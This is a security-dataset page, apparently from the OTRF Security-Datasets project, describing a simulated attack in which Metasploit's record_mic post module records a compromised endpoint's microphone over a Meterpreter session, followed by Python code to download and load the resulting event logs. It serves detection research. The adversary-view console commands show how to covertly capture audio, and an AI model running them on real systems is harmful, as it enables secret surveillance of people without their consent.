MSF Record Mic

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/06/09

Modification Date

2020/06/09

Tactics

TA0009

Techniques

T1123

Tags

Microphone Access

Dataset Description

This dataset represents adversaries accessing the microphone of an endpoint.

Simulation Metadata

Tools

type

Name

Module

C2

Metasploit

post

Adversary View

msf5 exploit(multi/handler) > use post/multi/manage/record_mic
msf5 post(multi/manage/record_mic) > set SESSION 2
SESSION => 2
msf5 post(multi/manage/record_mic) > info

      Name: Multi Manage Record Microphone
    Module: post/multi/manage/record_mic
  Platform: Linux, OSX, Windows
      Arch: 
      Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DURATION  5                no        Number of seconds to record
  SESSION   2                yes       The session to run this module on.

Description:
  This module will enable and record your target's microphone. For 
  non-Windows targets, please use Java meterpreter to be able to use 
  this feature.

msf5 post(multi/manage/record_mic) > run

[*] 172.18.39.6 - 20%...
[*] 172.18.39.6 - 40%...
[*] 172.18.39.6 - 60%...
[*] 172.18.39.6 - 80%...
[*] 172.18.39.6 - 100%...
[*] 172.18.39.6 - Audio size: (55169 bytes)
[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav
[*] Post module execution completed
msf5 post(multi/manage/record_mic) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)